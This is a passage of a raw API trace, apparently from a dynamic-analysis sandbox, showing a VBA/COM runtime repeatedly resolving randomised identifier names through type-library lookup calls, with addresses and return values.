lpMultiByteStr=0x3a611a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aXACAG") returned 7 [0068.851] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aXACAG", lHashVal=0x107d21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aXACAG") returned 7 [0068.851] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aXACAG", lHashVal=0x107d21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.851] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aXACAG") returned 0x107d21 [0068.851] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="aXACAG" | out: _Dst="aXACAG") returned 0x0 [0068.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="aXACAG") returned 7 [0068.851] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.851] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aXACAG", lHashVal=0x107d21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.851] IUnknown:Release (This=0x665ba50) returned 0xd [0068.851] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.851] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aXACAG", lHashVal=0x107d21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.851] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.851] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.851] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aXACAG", lHashVal=0x107d21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.851] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.851] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.851] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aXACAG", lHashVal=0x107d21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.851] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aXACAG") returned 7 [0068.851] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aXACAG", lHashVal=0x107d21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.851] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.851] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a611a2 | out: _Dst=0x67c2d40) returned 0x0 [0068.851] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aXACAG") returned 0x10f7ca [0068.851] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_aXACAG" | out: _Dst="_B_var_aXACAG") returned 0x0 [0068.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_aXACAG") returned 14 [0068.852] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.852] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aXACAG", lHashVal=0x10f7ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.852] IUnknown:Release (This=0x665ba50) returned 0xd [0068.852] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.852] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aXACAG", lHashVal=0x10f7ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.852] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.852] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.852] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aXACAG", lHashVal=0x10f7ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.852] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.852] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.852] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aXACAG", lHashVal=0x10f7ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.852] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.852] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.852] IUnknown:Release (This=0x665ba50) returned 0xd [0068.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2b6a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_aXACAG") returned 14 [0068.852] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aXACAG", lHashVal=0x10f7ca, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0) returned 0x0 [0068.852] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a611a2 | out: _Dst=0x144ec0) returned 0x0 [0068.852] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6117a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kCCUD_") returned 7 [0068.852] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kCCUD_", lHashVal=0x1053e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6117a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kCCUD_") returned 7 [0068.852] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kCCUD_", lHashVal=0x1053e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6117a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kCCUD_") returned 7 [0068.853] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kCCUD_", lHashVal=0x1053e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.853] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kCCUD_") returned 0x1053e6 [0068.853] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="kCCUD_" | out: _Dst="kCCUD_") returned 0x0 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="kCCUD_") returned 7 [0068.853] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.853] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kCCUD_", lHashVal=0x1053e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.853] IUnknown:Release (This=0x665ba50) returned 0xd [0068.853] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.853] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kCCUD_", lHashVal=0x1053e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.853] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.853] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.853] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kCCUD_", lHashVal=0x1053e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.853] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.853] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.853] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kCCUD_", lHashVal=0x1053e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.853] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6117a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kCCUD_") returned 7 [0068.853] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kCCUD_", lHashVal=0x1053e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.853] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.853] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6117a | out: _Dst=0x67c2d40) returned 0x0 [0068.853] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kCCUD_") returned 0x10ce8f [0068.853] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_kCCUD_" | out: _Dst="_B_var_kCCUD_") returned 0x0 [0068.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_kCCUD_") returned 14 [0068.853] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.854] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kCCUD_", lHashVal=0x10ce8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.854] IUnknown:Release (This=0x665ba50) returned 0xd [0068.854] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.854] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kCCUD_", lHashVal=0x10ce8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.854] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.854] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.854] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kCCUD_", lHashVal=0x10ce8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.854] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.854] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.854] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kCCUD_", lHashVal=0x10ce8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.854] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.854] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.854] IUnknown:Release (This=0x665ba50) returned 0xd [0068.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2b9a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_kCCUD_") returned 14 [0068.854] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kCCUD_", lHashVal=0x10ce8f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0) returned 0x0 [0068.854] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6117a | out: _Dst=0x144ec0) returned 0x0 [0068.854] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iAoAUAA", lHashVal=0x10e789, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iAoAUAA") returned 8 [0068.854] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iAoAUAA", lHashVal=0x10e789, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iAoAUAA") returned 8 [0068.854] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iAoAUAA", lHashVal=0x10e789, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.854] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAoAUAA") returned 0x10e789 [0068.854] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iAoAUAA" | out: _Dst="iAoAUAA") returned 0x0 [0068.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iAoAUAA") returned 8 [0068.854] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.854] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iAoAUAA", lHashVal=0x10e789, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.854] IUnknown:Release (This=0x665ba50) returned 0xd [0068.854] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.855] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iAoAUAA", lHashVal=0x10e789, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.855] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.855] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.855] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iAoAUAA", lHashVal=0x10e789, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.855] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.855] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.855] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iAoAUAA", lHashVal=0x10e789, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.855] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611ca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iAoAUAA") returned 8 [0068.855] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iAoAUAA", lHashVal=0x10e789, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.855] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.855] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a611ca | out: _Dst=0x67c2d40) returned 0x0 [0068.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iAoAUAA") returned 0x10eb0d [0068.855] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iAoAUAA" | out: _Dst="_B_var_iAoAUAA") returned 0x0 [0068.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iAoAUAA") returned 15 [0068.855] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.855] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iAoAUAA", lHashVal=0x10eb0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.855] IUnknown:Release (This=0x665ba50) returned 0xd [0068.855] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.855] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iAoAUAA", lHashVal=0x10eb0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.855] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.855] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.855] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iAoAUAA", lHashVal=0x10eb0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.855] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.855] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.855] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iAoAUAA", lHashVal=0x10eb0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.855] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.855] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.855] IUnknown:Release (This=0x665ba50) returned 0xd [0068.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2bca, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iAoAUAA") returned 15 [0068.855] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iAoAUAA", lHashVal=0x10eb0d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0068.856] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a611ca | out: _Dst=0x144ec0) returned 0x0 [0068.856] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jC1kCUZ", lHashVal=0x108f13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611f2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jC1kCUZ") returned 8 [0068.856] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jC1kCUZ", lHashVal=0x108f13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611f2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jC1kCUZ") returned 8 [0068.856] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jC1kCUZ", lHashVal=0x108f13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jC1kCUZ") returned 0x108f13 [0068.856] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jC1kCUZ" | out: _Dst="jC1kCUZ") returned 0x0 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jC1kCUZ") returned 8 [0068.856] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.856] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jC1kCUZ", lHashVal=0x108f13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.856] IUnknown:Release (This=0x665ba50) returned 0xd [0068.856] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.856] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jC1kCUZ", lHashVal=0x108f13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.856] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.856] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.856] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jC1kCUZ", lHashVal=0x108f13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.856] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.856] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.856] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jC1kCUZ", lHashVal=0x108f13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.856] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a611f2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jC1kCUZ") returned 8 [0068.857] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jC1kCUZ", lHashVal=0x108f13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.857] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.857] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a611f2 | out: _Dst=0x67c2d40) returned 0x0 [0068.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jC1kCUZ") returned 0x109297 [0068.857] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jC1kCUZ" | out: _Dst="_B_var_jC1kCUZ") returned 0x0 [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jC1kCUZ") returned 15 [0068.857] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.857] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jC1kCUZ", lHashVal=0x109297, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.857] IUnknown:Release (This=0x665ba50) returned 0xd [0068.857] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.857] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jC1kCUZ", lHashVal=0x109297, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.857] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.857] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.857] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jC1kCUZ", lHashVal=0x109297, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.857] IUnknown:Release 